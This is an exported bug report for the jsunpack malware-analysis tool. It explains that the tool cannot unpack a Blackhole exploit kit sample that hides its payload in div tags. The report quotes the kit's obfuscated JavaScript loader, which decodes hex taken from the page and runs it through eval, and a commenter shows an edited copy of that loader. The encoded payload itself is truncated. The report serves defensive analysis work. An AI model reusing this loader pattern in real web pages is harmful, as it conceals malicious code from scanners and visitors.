Div Obfuscation causes jsunpack to fail
GoogleCodeExporter opened this issue · comments
Jsunpack is not able to handle the latest blackhole exploit kit which contains
obfuscation within the div tags.
<html><body><style>#q{color:#fff;}</style><div id="q"
style="display:block;">3320.........
<script>z=function(){c="";
d=11;
for(i=32478-1;i!=-1;i--){
w=i;
v=a[w];
dd=32478-i-2+1;
b=d;
dd=dd-b*Math.floor(dd/d);
k=v*1-(dd-13);
kk=k;
c+=f.fromCharCode(kk);
}
md="a";
try{prototype||123;}catch(dagdsg){if(020==0x10)eval(c);}}
if(window.document)for(i=0;i<document.body.childNodes.length;i++){
if (document.body.childNodes[i].hasAttribute("style"))
if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}
a=[];
for(i=0;i<g.length;i+=2){
gg=g.substr(i,0x2);
a.push(parseInt(gg,0x10));
}
try{fwq&prototype}catch(qwrwqr){
if(020==0x10){f=String;
}}
z();
</script>
Attaching a sample file.
Original issue reported on code.google.com by rahulmoh...@gmail.com on 13 Aug 2012 at 6:16
Attachments:
The div is properly parsed, the issue is the to
document.body.childNodes[i].hasAttribute. I edited the javascript in the sample
to prove this as follows:
//edit start
/*if(window.document)for(i=0;i<document.body.childNodes.length;i++){
if (document.body.childNodes[i].hasAttribute("style"))
if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}*/
if(z)g=document.getElementById('q').innerHTML.replace(/hwehes/g,"");
//edit end
Please review the jsunpack submission here:
http://jsunpack.jeek.org/?report=69829f230fea941b3e7d10ae8a6066baf2cea1b4
Original comment by urul...@gmail.com on 13 Aug 2012 at 2:00